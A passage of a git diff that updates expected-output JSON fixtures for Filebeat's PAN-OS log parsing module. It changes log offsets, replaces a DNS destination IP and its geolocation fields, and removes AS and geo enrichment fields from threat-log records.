-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.222.222",
         "destination.nat.ip": "208.67.222.222",
         "destination.nat.port": 53,
@@ -9271,7 +9156,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 44928,
+        "log.offset": 45178,
         "network.application": "dns",
         "network.bytes": 216,
         "network.community_id": [
@@ -9374,7 +9259,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 45449,
+        "log.offset": 45699,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -9447,17 +9332,18 @@
         "client.nat.port": 8498,
         "client.packets": 1,
         "client.port": 52595,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 155,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -9471,7 +9357,7 @@
         "event.end": "2020-03-27T09:56:50.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "526 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,6640,1,52595,53,8498,53,0x400064,udp,allow,235,80,155,2,2020/03/27 09:56:50,0,any,0,2825812,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "526 <14>1 2020-03-27T09:57:19+01:00 PA-VM - - - - 1,2020/03/27 09:57:19,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:19,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:19,6640,1,52595,53,8498,53,0x400064,udp,allow,235,80,155,2,2020/03/27 09:56:50,0,any,0,2825812,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:56:50.000+01:00",
         "event.timezone": "+01:00",
@@ -9483,12 +9369,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 45956,
+        "log.offset": 46206,
         "network.application": "dns",
         "network.bytes": 235,
         "network.community_id": [
-            "1:cX/sAZ7/pEvR5+ZeVFubai/NmiU=",
-            "1:uM00i55bZAvnhupXoR1sjCdrx3M="
+            "1:8uxquscQTDaGKBDuinM2I4JNk9E=",
+            "1:U2Se6kg62Kqdn8xxw6AZ/ldQ+NQ="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -9505,12 +9391,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "6640",
-        "panw.panos.network.nat.community_id": "1:uM00i55bZAvnhupXoR1sjCdrx3M=",
+        "panw.panos.network.nat.community_id": "1:U2Se6kg62Kqdn8xxw6AZ/ldQ+NQ=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825812,
         "panw.panos.source.interface": "ethernet1/3",
@@ -9526,13 +9412,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 155,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -9586,7 +9472,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 46462,
+        "log.offset": 46722,
         "network.application": "ssl",
         "network.bytes": 763,
         "network.community_id": [
@@ -9689,7 +9575,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 46967,
+        "log.offset": 47227,
         "network.application": "web-browsing",
         "network.bytes": 4691,
         "network.community_id": [
@@ -9792,7 +9678,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 47487,
+        "log.offset": 47747,
         "network.application": "google-base",
         "network.bytes": 4691,
         "network.community_id": [
@@ -9866,14 +9752,7 @@
         "client.packets": 1,
         "client.port": 61558,
         "destination.address": "208.67.222.222",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.222.222",
         "destination.nat.ip": "208.67.222.222",
         "destination.nat.port": 53,
@@ -9901,7 +9780,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 48029,
+        "log.offset": 48289,
         "network.application": "dns",
         "network.bytes": 88,
         "network.community_id": [
@@ -9976,14 +9855,7 @@
         "client.packets": 1,
         "client.port": 54614,
         "destination.address": "208.67.222.222",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 666,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.222.222",
         "destination.nat.ip": "208.67.222.222",
         "destination.nat.port": 443,
@@ -10011,7 +9883,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 48544,
+        "log.offset": 48804,
         "network.application": "dnscrypt",
         "network.bytes": 904,
         "network.community_id": [
@@ -10114,7 +9986,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 49069,
+        "log.offset": 49329,
         "network.application": "ssl",
         "network.bytes": 905,
         "network.community_id": [
@@ -10216,7 +10088,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 49572,
+        "log.offset": 49832,
         "network.application": "ssl",
         "network.bytes": 905,
         "network.community_id": [
@@ -10289,17 +10161,18 @@
         "client.nat.port": 5019,
         "client.packets": 1,
         "client.port": 59479,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -10313,7 +10186,7 @@
         "event.end": "2020-03-27T09:57:17.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,47300,1,59479,53,5019,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:17,0,any,0,2825802,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:17+01:00 PA-VM - - - - 1,2020/03/27 09:57:16,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:16,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:16,47300,1,59479,53,5019,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:17,0,any,0,2825802,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:17.000+01:00",
         "event.timezone": "+01:00",
@@ -10325,12 +10198,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 50075,
+        "log.offset": 50335,
         "network.application": "dns",
         "network.bytes": 97,
         "network.community_id": [
-            "1:034cmEuUmzrfPtJNEB6qtgQkEM4=",
-            "1:tiZQiOsx7Hl1UTep1NIb5ys9EJI="
+            "1:IcyfqNRJP4lRPAgYf/GBfJYVtKo=",
+            "1:gD+AdfVnQqmW3No4E/rSQdfNuf0="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -10347,12 +10220,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "47300",
-        "panw.panos.network.nat.community_id": "1:034cmEuUmzrfPtJNEB6qtgQkEM4=",
+        "panw.panos.network.nat.community_id": "1:gD+AdfVnQqmW3No4E/rSQdfNuf0=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825802,
         "panw.panos.source.interface": "ethernet1/3",
@@ -10368,13 +10241,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -10428,7 +10301,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 50576,
+        "log.offset": 50846,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -10531,7 +10404,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 51077,
+        "log.offset": 51347,
         "network.application": "google-base",
         "network.bytes": 7126,
         "network.community_id": [
diff --git a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json
index f6953af5ad7d..4b1410f4d87a 100644
--- a/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/threat.log-expected.json
@@ -6,13 +6,6 @@
         "client.nat.port": 37679,
         "client.port": 52984,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -111,13 +104,6 @@
         "client.nat.port": 28249,
         "client.port": 52983,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -216,13 +202,6 @@
         "client.nat.port": 63898,
         "client.port": 52986,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -321,13 +300,6 @@
         "client.nat.port": 7515,
         "client.port": 52985,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -426,13 +398,6 @@
         "client.nat.port": 3225,
         "client.port": 52987,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -531,13 +496,6 @@
         "client.nat.port": 60449,
         "client.port": 52988,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -636,13 +594,6 @@
         "client.nat.port": 60559,
         "client.port": 52990,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -741,13 +692,6 @@
         "client.nat.port": 47414,
         "client.port": 52989,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -846,13 +790,6 @@
         "client.nat.port": 37673,
         "client.port": 52992,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -951,13 +888,6 @@
         "client.nat.port": 8232,
         "client.port": 52991,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -1056,13 +986,6 @@
         "client.nat.port": 32982,
         "client.port": 52994,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -1161,13 +1084,6 @@
         "client.nat.port": 10473,
         "client.port": 52993,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -1266,13 +1182,6 @@
         "client.nat.port": 20446,
         "client.port": 52995,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -1371,13 +1280,6 @@
         "client.nat.port": 34699,
         "client.port": 52996,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -1476,13 +1378,6 @@
         "client.nat.port": 22820,
         "client.port": 52997,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -1581,13 +1476,6 @@
         "client.nat.port": 41060,
         "client.port": 52998,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -1686,13 +1574,6 @@
         "client.nat.port": 9058,
         "client.port": 52999,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -1791,13 +1672,6 @@
         "client.nat.port": 54846,
         "client.port": 53001,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -1896,13 +1770,6 @@
         "client.nat.port": 52731,
         "client.port": 53002,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -2001,13 +1868,6 @@
         "client.nat.port": 15165,
         "client.port": 53003,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -2106,13 +1966,6 @@
         "client.nat.port": 53918,
         "client.port": 53004,
         "destination.address": "23.72.137.131",
-        "destination.as.number": 20940,
-        "destination.as.organization.name": "Akamai International B.V.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.137.131",
         "destination.nat.ip": "23.72.137.131",
@@ -2211,13 +2064,6 @@
         "client.nat.port": 40792,
         "client.port": 53000,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -2316,13 +2162,6 @@
         "client.nat.port": 54044,
         "client.port": 53006,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -2421,13 +2260,6 @@
         "client.nat.port": 19544,
         "client.port": 53007,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -2526,13 +2358,6 @@
         "client.nat.port": 13462,
         "client.port": 53008,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -2631,13 +2456,6 @@
         "client.nat.port": 44892,
         "client.port": 53010,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -2736,13 +2554,6 @@
         "client.nat.port": 16487,
         "client.port": 53011,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -2841,13 +2652,6 @@
         "client.nat.port": 23952,
         "client.port": 53012,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -2946,13 +2750,6 @@
         "client.nat.port": 2810,
         "client.port": 53013,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -3051,13 +2848,6 @@
         "client.nat.port": 13272,
         "client.port": 53014,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -3156,13 +2946,6 @@
         "client.nat.port": 8663,
         "client.port": 53022,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -3261,13 +3044,6 @@
         "client.nat.port": 55738,
         "client.port": 53023,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -3366,13 +3142,6 @@
         "client.nat.port": 10650,
         "client.port": 53024,
         "destination.address": "152.195.55.192",
